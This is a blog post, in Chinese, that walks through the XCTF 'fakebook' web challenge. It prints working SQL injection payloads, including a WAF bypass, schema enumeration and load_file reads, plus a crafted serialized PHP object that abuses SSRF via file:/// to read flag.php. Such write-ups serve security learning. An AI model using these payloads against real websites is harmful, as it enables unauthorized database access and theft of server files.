<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>XCTF_fakebook - Wking&#039;s Blog</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="Wking&#039;s Blog"><meta name="msapplication-TileImage" content="/img/favicon.png"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Wking&#039;s Blog"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="XCTF_fakegame的一道有趣题"><meta property="og:type" content="blog"><meta property="og:title" content="XCTF_fakebook"><meta property="og:url" content="https://wkingxc.com/2021/09/29/XCTF-fakegame/"><meta property="og:site_name" content="Wking&#039;s Blog"><meta property="og:description" content="XCTF_fakegame的一道有趣题"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://i.loli.net/2021/09/28/6JiUIWxgj4rCchD.png"><meta property="og:image" content="https://i.loli.net/2021/09/28/4VXyQCrAbuS1l5U.png"><meta property="og:image" content="https://i.loli.net/2021/09/28/xrydTuZwhEpXeas.png"><meta property="og:image" content="https://i.loli.net/2021/09/28/WqKFzX29t16ZlIY.png"><meta property="og:image" content="https://i.loli.net/2021/09/28/TMVbt7viIG3xrEf.png"><meta property="og:image" content="https://i.loli.net/2021/09/28/8VQJMoKYf1tFmhD.png"><meta property="og:image" content="https://i.loli.net/2021/09/28/cABgP3vqOi156VK.png"><meta property="og:image" content="https://i.loli.net/2021/09/28/iDuy5AtSHGgZdko.png"><meta property="og:image" content="https://i.loli.net/2021/09/28/Khqo4XrGnPdYkTz.png"><meta property="og:image" content="https://i.loli.net/2021/09/28/VjcwlKYa8nxWIyR.png"><meta property="og:image" content="https://i.loli.net/2021/09/28/Q6KxkqWh4JEm2fu.png"><meta property="og:image" content="https://i.loli.net/2021/09/28/wOfv2k9De3xjM7A.png"><meta property="og:image" content="https://i.loli.net/2021/09/28/YofrIXEsu3tROxP.png"><meta property="og:image" content="https://i.loli.net/2021/09/28/9Gx2oKNRbmpTqwI.png"><meta property="og:image" content="https://i.loli.net/2021/09/28/hIf3dyrvCKPpRoa.png"><meta property="og:image" content="https://i.loli.net/2021/09/28/lUHPewyV4MSZ7ft.png"><meta property="article:published_time" content="2021-09-29T13:38:33.000Z"><meta property="article:modified_time" content="2021-09-29T13:38:33.000Z"><meta property="article:author" content="Wking"><meta property="article:tag" content="sql注入"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://i.loli.net/2021/09/28/6JiUIWxgj4rCchD.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://wkingxc.com/2021/09/29/XCTF-fakegame/"},"headline":"XCTF_fakebook","image":["https://i.loli.net/2021/09/28/6JiUIWxgj4rCchD.png","https://i.loli.net/2021/09/28/4VXyQCrAbuS1l5U.png","https://i.loli.net/2021/09/28/xrydTuZwhEpXeas.png","https://i.loli.net/2021/09/28/WqKFzX29t16ZlIY.png","https://i.loli.net/2021/09/28/TMVbt7viIG3xrEf.png","https://i.loli.net/2021/09/28/8VQJMoKYf1tFmhD.png","https://i.loli.net/2021/09/28/cABgP3vqOi156VK.png","https://i.loli.net/2021/09/28/iDuy5AtSHGgZdko.png","https://i.loli.net/2021/09/28/Khqo4XrGnPdYkTz.png","https://i.loli.net/2021/09/28/VjcwlKYa8nxWIyR.png","https://i.loli.net/2021/09/28/Q6KxkqWh4JEm2fu.png","https://i.loli.net/2021/09/28/wOfv2k9De3xjM7A.png","https://i.loli.net/2021/09/28/YofrIXEsu3tROxP.png","https://i.loli.net/2021/09/28/9Gx2oKNRbmpTqwI.png","https://i.loli.net/2021/09/28/hIf3dyrvCKPpRoa.png","https://i.loli.net/2021/09/28/lUHPewyV4MSZ7ft.png"],"datePublished":"2021-09-29T13:38:33.000Z","dateModified":"2021-09-29T13:38:33.000Z","author":{"@type":"Person","name":"Wking"},"publisher":{"@type":"Organization","name":"Wking's Blog","logo":{"@type":"ImageObject","url":"https://wkingxc.com/img/logo.png"}},"description":"XCTF_fakegame的一道有趣题"}</script><link rel="canonical" href="https://wkingxc.com/2021/09/29/XCTF-fakegame/"><link rel="icon" href="/img/favicon.png"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.3.0"></head><body class="is-2-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.png" alt="Wking&#039;s Blog" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">主页</a><a class="navbar-item" href="/archives">时间轴</a><a class="navbar-item" href="/categories">目录</a><a class="navbar-item" href="/friends">友链</a><a class="navbar-item" href="/good_articles">精选</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="GitHub" href="https://github.com/Wkingxc"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-10-tablet is-10-desktop is-10-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2021-09-29T13:38:33.000Z" title="2021/9/29 21:38:33">2021-09-29</time>发表</span><span class="level-item"><a class="link-muted" style="color:#1E90FF;" href="/categories/XCTF/">XCTF</a></span><span class="level-item">6 分钟读完 (大约960个字)</span></div></div><h1 class="title is-3 is-size-4-mobile">XCTF_fakebook</h1><div class="content"><p>XCTF_fakegame的一道有趣题</p>
<span id="more"></span>
<h2 id="一、fakebook"><a href="#一、fakebook" class="headerlink" title="一、fakebook"></a>一、fakebook</h2><p><img src="https://i.loli.net/2021/09/28/6JiUIWxgj4rCchD.png"></p>
<p>发现是个登录注册页面，没有明确的目标，先用dirsearch扫描下目录</p>
<p><img src="https://i.loli.net/2021/09/28/4VXyQCrAbuS1l5U.png"></p>
<p>查看flag.php,发现没任何内容，可能是不允许外网访问，考虑利用SSRF漏洞的可能性</p>
<p>查看&#x2F;robots.txt发现<code>/user.php.bak</code>备份文件，下载查看</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class UserInfo</span><br><span class="line">&#123;</span><br><span class="line">    public $name = &quot;&quot;;</span><br><span class="line">    public $age = 0;</span><br><span class="line">    public $blog = &quot;&quot;;</span><br><span class="line"></span><br><span class="line">    public function __construct($name, $age, $blog)</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;name = $name;</span><br><span class="line">        $this-&gt;age = (int)$age;</span><br><span class="line">        $this-&gt;blog = $blog;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function get($url)</span><br><span class="line">    &#123;</span><br><span class="line">        $ch = curl_init();</span><br><span class="line"></span><br><span class="line">        curl_setopt($ch, CURLOPT_URL, $url);</span><br><span class="line">        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);</span><br><span class="line">        $output = curl_exec($ch);</span><br><span class="line">        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);</span><br><span class="line">        if($httpCode == 404) &#123;</span><br><span class="line">            return 404;</span><br><span class="line">        &#125;</span><br><span class="line">        curl_close($ch);</span><br><span class="line"></span><br><span class="line">        return $output;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function getBlogContents ()</span><br><span class="line">    &#123;</span><br><span class="line">        return $this-&gt;get($this-&gt;blog);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function isValidBlog ()</span><br><span class="line">    &#123;</span><br><span class="line">        $blog = $this-&gt;blog;</span><br><span class="line">        return preg_match(&quot;/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]&#123;2,6&#125;(\:[0-9]+)?(\/\S*)?$/i&quot;, $blog);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>解题的关键应该就是这个get函数传入的$url</p>
<p>注册一个账号：</p>
<p><img src="https://i.loli.net/2021/09/28/xrydTuZwhEpXeas.png"></p>
<p>点击admin，观察URL发现有个传参</p>
<p><img src="https://i.loli.net/2021/09/28/WqKFzX29t16ZlIY.png"></p>
<p>更改参数，发现两个报错</p>
<p><img src="https://i.loli.net/2021/09/28/TMVbt7viIG3xrEf.png"></p>
<p>尝试sql注入：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">view.php?no=1 and 1=1<span class="comment"># 正常 </span></span><br><span class="line">view.php?no=1 and 1=2<span class="comment"># 报错</span></span><br></pre></td></tr></table></figure>

<p>说明存在<font color='red'>整型注入</font>,接着使用union注入常用套路：</p>
<blockquote>
<p>建议一边手工注入，一边开启sqlmap在后台跑，因为可能会出现waf</p>
</blockquote>
<p>order by 时，4正常，5报错，所以column是4</p>
<p><img src="https://i.loli.net/2021/09/28/8VQJMoKYf1tFmhD.png"></p>
<p>果不其然，使用union时，出现了waf：</p>
<p><img src="https://i.loli.net/2021/09/28/cABgP3vqOi156VK.png"></p>
<p>尝试一些基本的绕过方式：<a href="https://blog.csdn.net/weixin_44940180/article/details/107717511">SQL注入–绕过技巧</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">view.php?no=2 union (select 1,2,3,4) <span class="comment">#</span></span><br></pre></td></tr></table></figure>

<p>应该是直接拦截<code>union select</code>，发现2的回显位置出现了</p>
<p><img src="https://i.loli.net/2021/09/28/iDuy5AtSHGgZdko.png"></p>
<p>分别查看当前数据库和用户：</p>
<p><img src="https://i.loli.net/2021/09/28/Khqo4XrGnPdYkTz.png"><img src="https://i.loli.net/2021/09/28/VjcwlKYa8nxWIyR.png" alt="image-20210928225336783"></p>
<p>发现用户竟然是<font color='red'>root</font>用户，看了别人的教程，发现此处满足 <code>load_file()</code>的所有条件，所以可以直接读取flag.php</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">view.php?no=2 union (select 1,load_file(<span class="string">&quot;/var/www/html/flag.php&quot;</span>),3,4)<span class="comment">#</span></span><br></pre></td></tr></table></figure>

<p>查看相应位置的源代码：</p>
<p><img src="https://i.loli.net/2021/09/28/Q6KxkqWh4JEm2fu.png"></p>
<hr>
<p>前面忙活了那么多，结果出来个root用户，下面尝试用正常union注入去找表和字段：</p>
<p>找表：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">view.php?no=2 union (select 1,group_concat(<span class="string">&#x27;&lt;br&gt;&#x27;</span>,table_name),3,4 from information_schema.tables <span class="built_in">where</span> table_schema=database())<span class="comment">#</span></span><br></pre></td></tr></table></figure>

<p>只找到了<code>users</code>表，紧接着找字段：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">view.php?no=2 union (select 1,group_concat(<span class="string">&#x27;&lt;br&gt;&#x27;</span>,column_name),3,4 from information_schema.columns <span class="built_in">where</span> table_name=<span class="string">&#x27;users&#x27;</span>)<span class="comment">#</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/09/28/wOfv2k9De3xjM7A.png"></p>
<p>前3个字段是知道的，现在查看<code>data</code>字段：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">view.php?no=2 union (select 1,data,3,4 from <span class="built_in">users</span>)<span class="comment">#</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/09/28/YofrIXEsu3tROxP.png"></p>
<p>是序列化后的用户，那么整个博客页面是不是有可能由这几个字段，最可能是data字段进行渲染的？！</p>
<p>测试发现，当前面的no&#x3D;3时，而<font color='red'>第四个</font>传入序列化的对象后，页面仍可以正常显示！</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">view.php?no=3 union (select 1,2,3,<span class="string">&#x27;O:8:&quot;UserInfo&quot;:3:&#123;s:4:&quot;name&quot;;s:5:&quot;admin&quot;;s:3:&quot;age&quot;;i:18;s:4:&quot;blog&quot;;s:7:&quot;123.com&quot;;&#125;&#x27;</span>)<span class="comment">#</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/09/28/9Gx2oKNRbmpTqwI.png"></p>
<p>想到之前提过的SSRF，可以利用<code>file://</code>协议读取本地文件!</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">view.php?no=2 union (select 1,2,3,<span class="string">&#x27;O:8:&quot;UserInfo&quot;:3:&#123;s:4:&quot;name&quot;;s:5:&quot;admin&quot;;s:3:&quot;age&quot;;i:18;s:4:&quot;blog&quot;;s:29:&quot;file:///var/www/html/flag.php&quot;;&#125;&#x27;</span>)<span class="comment">#</span></span><br></pre></td></tr></table></figure>

<p>没有出现什么东西，但查看源码发现一串很长的base64码</p>
<p><img src="https://i.loli.net/2021/09/28/hIf3dyrvCKPpRoa.png"></p>
<p>解码得到：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$flag</span> = <span class="string">&quot;flag&#123;c1e552fdf77049fabf65168f22f7aeab&#125;&quot;</span>;</span><br><span class="line"><span class="keyword">exit</span>(<span class="number">0</span>);</span><br></pre></td></tr></table></figure>

<p>实际上在firefox渗透版里，直接点击就可以直接查看flag.php的源码：</p>
<p><img src="https://i.loli.net/2021/09/28/lUHPewyV4MSZ7ft.png"></p>
<hr>
<p>原本以为是道代码审计，结果是个注入，嗐，菜鸡只能走一步看一步。</p>
<p>听说在join的时候，有post的注入点，赶紧拿sqlmap试了下：</p>
</div><div class="article-licensing box"><div class="licensing-title"><p>XCTF_fakebook</p><p><a href="https://wkingxc.com/2021/09/29/XCTF-fakegame/">https://wkingxc.com/2021/09/29/XCTF-fakegame/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>Wking</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2021-09-29</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2021-09-29</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="article-tags is-size-7 mb-4"><span class="mr-2">#</span><a class="link-muted mr-2" rel="tag" href="/tags/sql%E6%B3%A8%E5%85%A5/">sql注入</a></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css"><div class="social-share"></div><script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2021/10/06/%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E9%9A%8F%E7%AC%94/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">电子取证随笔</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2021/09/28/Web%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E/"><span class="level-item">Web基础漏洞</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">评论</h3><div id="disqus_thread"><noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript></div><script>var disqus_config = function () {
            this.page.url = 'https://wkingxc.com/2021/09/29/XCTF-fakegame/';
            this.page.identifier = '2021/09/29/XCTF-fakegame/';
        };
        (function() {
            var d = document, s = d.createElement('script');  
            s.src = '//' + 'wkingxc' + '.disqus.com/embed.js';
            s.setAttribute('data-timestamp', +new Date());
            (d.head || d.body).appendChild(s);
        })();</script></div></div></div><!--!--><div class="column column-right is-4-tablet is-4-desktop is-4-widescreen  order-3 is-sticky"><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#一、fakebook"><span class="level-left"><span class="level-item">1</span><span class="level-item">一、fakebook</span></span></a></li></ul></div></div><script src="/js/toc.js" defer></script></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logo.png" alt="Wking&#039;s Blog" height="28"></a><p class="is-size-7"><span>&copy; 2023 Wking</span><span id="timeDate">载入天数...</span><span id="times">载入时分秒...</span><script>
                            var now = new Date();
                            function createtime() {
                                var grt= new Date("10/1/2021 16:23:00");//此处修改你的建站时间或者网站上线时间
                                now.setTime(now.getTime()+250);
                                days = (now - grt ) / 1000 / 60 / 60 / 24; dnum = Math.floor(days);
                                hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours);
                                if(String(hnum).length ==1 ){hnum = "0" + hnum;} minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
                                mnum = Math.floor(minutes); if(String(mnum).length ==1 ){mnum = "0" + mnum;}
                                seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
                                snum = Math.round(seconds); if(String(snum).length ==1 ){snum = "0" + snum;}
                                document.getElementById("timeDate").innerHTML = "| 本站已运行 "+dnum+" 天 ";
                                document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒";
                            }
                            setInterval("createtime()",250);
                            </script></p><p class="is-size-7">© 2021-2023</p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-cn");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script type="text/x-mathjax-config">MathJax.Hub.Config({
            'HTML-CSS': {
                matchFontHeight: false
            },
            SVG: {
                matchFontHeight: false
            },
            CommonHTML: {
                matchFontHeight: false
            },
            tex2jax: {
                inlineMath: [
                    ['$','$'],
                    ['\\(','\\)']
                ]
            }
        });</script><script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.9/unpacked/MathJax.js?config=TeX-MML-AM_CHTML" defer></script><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>